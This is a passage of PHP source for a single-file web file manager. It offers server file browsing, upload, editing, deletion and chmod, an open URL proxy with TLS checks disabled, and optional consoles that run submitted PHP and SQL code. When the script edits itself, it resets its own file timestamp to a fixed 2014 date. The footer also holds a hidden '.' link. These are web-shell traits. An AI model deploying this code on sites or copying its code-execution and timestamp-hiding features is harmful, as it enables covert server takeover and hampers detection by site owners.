isset($_GET['url'])?urldecode($_GET['url']):''; $proxy_form = ' <div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);"> <form action="" method="GET"> <input type="hidden" name="proxy" value="true"> '.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55"> <input type="submit" value="'.__('Show').'" class="fm_input"> </form> </div> '; if ($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); $result = curl_exec($ch); curl_close($ch); //$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result); $result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result); $result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result); echo $result; die(); } } ?> <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title><?=__('File manager')?></title> <style> body { background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; margin: 0px; } a:link, a:active, a:visited { color: #006699; text-decoration: none; } a:hover { color: #DD6900; text-decoration: underline; } a.th:link { color: #FFA34F; text-decoration: none; } a.th:active { color: #FFA34F; text-decoration: none; } a.th:visited { color: #FFA34F; text-decoration: none; } a.th:hover { color: #FFA34F; text-decoration: underline; } table.bg { background-color: #ACBBC6 } th, td { font: normal 8pt Verdana, Arial, Helvetica, sans-serif; padding: 3px; } th { height: 25px; background-color: #006699; color: #FFA34F; font-weight: bold; font-size: 11px; } .row1 { background-color: #EFEFEF; } .row2 { background-color: #DEE3E7; } .row3 { background-color: #D1D7DC; padding: 5px; } tr.row1:hover { background-color: #F3FCFC; } tr.row2:hover { background-color: #F0F6F6; } .whole { width: 100%; } .all tbody td:first-child{width:100%;} textarea { font: 9pt 'Courier New', courier; line-height: 125%; padding: 5px; } .textarea_input { height: 1em; } .textarea_input:focus { height: auto; } input[type=submit]{ background: #FCFCFC none !important; cursor: pointer; } .folder { background-image: url(""); } .file { background-image: url(""); } <?=fm_home_style()?> .img { background-image: url(""); } @media screen and (max-width:720px){ table{display:block;} #fm_table td{display:inline;float:left;} #fm_table tbody td:first-child{width:100%;padding:0;} #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;} #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;} #fm_table tr{display:block;float:left;clear:left;width:100%;} #header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;} #header_table table td {display:inline;float:left;} } </style> </head> <body> <?php $url_inc = '?fm=true'; if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){ $res = empty($_POST['sql']) ? '' : $_POST['sql']; $res_lng = 'sql'; } elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){ $res = empty($_POST['php']) ? '' : $_POST['php']; $res_lng = 'php'; } if (isset($_GET['fm_settings'])) { echo ' <table class="whole"> <form method="post" action=""> <tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr> '.(empty($msg)?'':'<tr><td class="row2" colspan="2">'.$msg.'</td></tr>').' '.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').' '.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').' '.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').' '.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').' '.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').' '.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').' '.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').' '.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').' '.fm_config_checkbox_row(__('Show').' xls','show_xls').' '.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').' '.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').' <tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr> <tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr> <tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr> <tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr> '.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').' '.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').' '.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').' '.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').' '.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').' <tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr> </form> </table> <table> <form method="post" action=""> <tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr> <tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr> <tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr> <tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr> <tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr> <tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr> <tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr> </form> </table>'; echo fm_tpl_form('php'),fm_tpl_form('sql'); } elseif (isset($proxy_form)) { die($proxy_form); } elseif (isset($res_lng)) { ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php'); else echo '</h2></td><td>'.fm_run_input('sql'); ?></td></tr></table></td> </tr> <tr> <td class="row1"> <a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a> <form action="" method="POST" name="console"> <textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/> <input type="reset" value="<?=__('Reset')?>"> <input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run"> <?php $str_tmpl = $res_lng.'_templates'; $tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : ''; if (!empty($tmpl)){ $active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : ''; $select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n"; $select .= '<option value="-1">' . __('Select') . "</option>\n"; foreach ($tmpl as $key=>$value){ $select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n"; } $select .= "</select>\n"; echo $select; } ?> </form> </td> </tr> </table> <?php if (!empty($res)) { $fun='fm_'.$res_lng; echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>'; } } elseif (!empty($_REQUEST['edit'])){ if(!empty($_REQUEST['save'])) { $fn = $path . $_REQUEST['edit']; $filemtime = filemtime($fn); if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg .= __('File updated'); else $msg .= __('Error occurred'); if ($_GET['edit']==basename(__FILE__)) { touch(__FILE__,1415116371); } else { if (!empty($fm_config['restore_time'])) touch($fn,$filemtime); } } $oldcontent = @file_get_contents($path . $_REQUEST['edit']); $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table border='0' cellspacing='0' cellpadding='1' width="100%"> <tr> <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$editlink?>"> <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea> <input type="submit" name="save" value="<?=__('Submit')?>"> <input type="submit" name="cancel" value="<?=__('Cancel')?>"> </form> </td> </tr> </table> <?php echo $auth['script']; } elseif(!empty($_REQUEST['rights'])){ if(!empty($_REQUEST['save'])) { if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively'])) $msg .= (__('File updated')); else $msg .= (__('Error occurred')); } clearstatcache(); $oldrights = fm_rights_string($path . $_REQUEST['rights'], true); $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>"> <?php if (is_dir($path.$_REQUEST['rights'])) { ?> <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/> <?php } ?> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') { if(!empty($_REQUEST['save'])) { rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']); $msg .= (__('File updated')); $_REQUEST['rename'] = $_REQUEST['newname']; } clearstatcache(); $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } else { //Let's rock! $msg = ''; if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) { if(!empty($_FILES['upload']['name'])){ $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']); if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){ $msg .= __('Error occurred'); } else { $msg .= __('Files uploaded').': '.$_FILES['upload']['name']; } } } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') { if(!fm_del_files(($path . $_REQUEST['delete']), true)) { $msg .= __('Error occurred'); } else { $msg .= __('Deleted').' '.$_REQUEST['delete']; } } elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) { if(!@mkdir($path . $_REQUEST['dirname'],0777)) { $msg .= __('Error occurred'); } else { $msg .= __('Created').' '.$_REQUEST['dirname']; } } elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) { if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) { $msg .= __('Error occurred'); } else { fclose($fp); $msg .= __('Created').' '.$_REQUEST['filename']; } } elseif (isset($_GET['zip'])) { $source = base64_decode($_GET['zip']); $destination = basename($source).'.zip'; set_time_limit(0); $phar = new PharData($destination); $phar->buildFromDirectory($source); if (is_file($destination)) $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>'; else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['gz'])) { $source = base64_decode($_GET['gz']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); clearstatcache(); set_time_limit(0); //die(); $phar = new PharData($destination); $phar->buildFromDirectory($source); $phar->compress(Phar::GZ,'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['decompress'])) { // $source = base64_decode($_GET['decompress']); // $destination = basename($source); // $ext = end(explode(".", $destination)); // if ($ext=='zip' OR $ext=='gz') { // $phar = new PharData($source); // $phar->decompress(); // $base_file = str_replace('.'.$ext,'',$destination); // $ext = end(explode(".", $base_file)); // if ($ext=='tar'){ // $phar = new PharData($base_file); // $phar->extractTo(dir($source)); // } // } // $msg .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done'); } elseif (isset($_GET['gzfile'])) { $source = base64_decode($_GET['gzfile']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); set_time_limit(0); //echo $destination; $ext_arr = explode('.',basename($source)); if (isset($ext_arr[1])) { unset($ext_arr[0]); $ext=implode('.',$ext_arr); } $phar = new PharData($destination); $phar->addFile($source); $phar->compress(Phar::GZ,$ext.'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } ?> <table class="whole" id="header_table" > <tr> <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th> </tr> <?php if(!empty($msg)){ ?> <tr> <td colspan="2" class="row2"><?=$msg?></td> </tr> <?php } ?> <tr> <td class="row2"> <table> <tr> <td> <?=fm_home()?> </td> <td> <?php if(!empty($fm_config['make_directory'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="dirname" size="15"> <input type="submit" name="mkdir" value="<?=__('Make directory')?>"> </form> <?php } ?> </td> <td> <?php if(!empty($fm_config['new_file'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="filename" size="15"> <input type="submit" name="mkfile" value="<?=__('New file')?>"> </form> <?php } ?> </td> <td> <?=fm_run_input('php')?> </td> <td> <?=fm_run_input('sql')?> </td> </tr> </table> </td> <td class="row3"> <table> <tr> <td> <?php if (!empty($fm_config['upload_file'])) { ?> <form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" /> <input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" /> <input type="submit" name="test" value="<?=__('Upload')?>" /> </form> <?php } ?> </td> <td> <?php if ($auth['authorize']) { ?> <form action="" method="post"> <input name="quit" type="hidden" value="1"> <?=__('Hello')?>, <?=$auth['login']?> <input type="submit" value="<?=__('Quit')?>"> </form> <?php } ?> </td> <td> <?=fm_lang_form($language)?> </td> <tr> </table> </td> </tr> </table> <table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%"> <thead> <tr> <th style="white-space:nowrap"> <?=__('Filename')?> </th> <th style="white-space:nowrap"> <?=__('Size')?> </th> <th style="white-space:nowrap"> <?=__('Date')?> </th> <th style="white-space:nowrap"> <?=__('Rights')?> </th> <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th> </tr> </thead> <tbody> <?php $elements = fm_scan_dir($path, '', 'all', true); $dirs = array(); $files = array(); foreach ($elements as $file){ if(@is_dir($path . $file)){ $dirs[] = $file; } else { $files[] = $file; } } natsort($dirs); natsort($files); $elements = array_merge($dirs, $files); foreach ($elements as $file){ $filename = $path . $file; $filedata = @stat($filename); if(@is_dir($filename)){ $filedata[7] = ''; if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename); $link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder"> </span> '.$file.'</a>'; $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').' zip',__('Archiving').' '. $file); $arlink = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').' .tar.gz',__('Archiving').' '.$file); $style = 'row2'; if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; else $alert = ''; } else { $link = $fm_config['show_img']&&@getimagesize($filename) ? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\'' . fm_img_link($filename) .'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img"> </span> '.$file.'</a>' : '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file"> </span> '.$file.'</a>'; $e_arr = explode(".", $file); $ext = end($e_arr); $loadlink = fm_link('download',$filename,__('Download'),__('Download').' '. $file); $arlink = in_array($ext,array('zip','gz','tar')) ? '' : ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').' .tar.gz',__('Archiving').' '. $file)); $style = 'row1'; $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; } $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>'; $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>'; ?> <tr class="<?=$style?>"> <td><?=$link?></td> <td><?=$filedata[7]?></td> <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td> <td><?=$rightstext?></td> <td><?=$deletelink?></td> <td><?=$renamelink?></td> <td><?=$loadlink?></td> <td><?=$arlink?></td> </tr> <?php } } ?> </tbody> </table> <div class="row3"><?php $mtime = explode(' ', microtime()); $totaltime = $mtime[0] + $mtime[1] - $starttime; echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/fahriyzx/Filemanager">Github</a> | <a href="'.fm_site_url().'">.</a>'; if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion(); if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file(); if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2); if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>'; if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>'; if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>'; if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>'; ?> </div> <script type="text/javascript"> function download_xls(filename, text) { var element = document.createElement('a'); element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text); element.setAttribute('download', filename); element.style.display = 'none'; document.body.appendChild(element); element.click(); document.body.removeChild(element); } function base64_encode(m) { for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) { c = m.charCodeAt(l); if (128 > c) d = 1; else for (d = 2; c >= 2 << 5 * d;) ++d; for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f]) } b && (g += k[f << 6 - b]); return g } var tableToExcelData = (function() { var uri = 'data:application/vnd.ms-excel;base64,', template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>', format = function(s, c) { return s.replace(/{(\w+)}/g, function(m, p) { return c[p]; }) } return function(table, name) { if (!table.nodeType) table = document.getElementById(table) var ctx = { worksheet: name || 'Worksheet', table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1") } t = new Date(); filename = 'fm_' + t.toISOString() + '.xls' download_xls(filename, base64_encode(format(template, ctx))) } })(); var table2Excel = function () { var ua = window.navigator.userAgent; var msie = ua.indexOf("MSIE "); this.CreateExcelSheet = function(el, name){ if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer var x = document.getElementById(el).rows; var xls = new ActiveXObject("Excel.Application"); xls.visible = true; xls.Workbooks.Add for (i = 0; i < x.length; i++) { var y = x[i].cells; for (j = 0; j < y.length; j++) { xls.Cells(i + 1, j + 1).Value = y[j].innerText; } } xls.Visible = true; xls.UserControl = true; return xls; } else { tableToExcelData(el, name); } } } </script> </body> </html> <?php //Ported from ReloadCMS project http://reloadcms.com class archiveTar { var $archive_name = ''; var $tmp_file = 0; var $file_pos = 0; var $isGzipped = true; var $errors = array(); var $files = array(); function __construct(){ if (!isset($this->errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.': <br/>'; foreach ($Errors as $value) $message .= $value.'<br/>'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $i<count($file_array); $i++){ $filename = $file_array[$i]; if ($filename == $this->archive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' 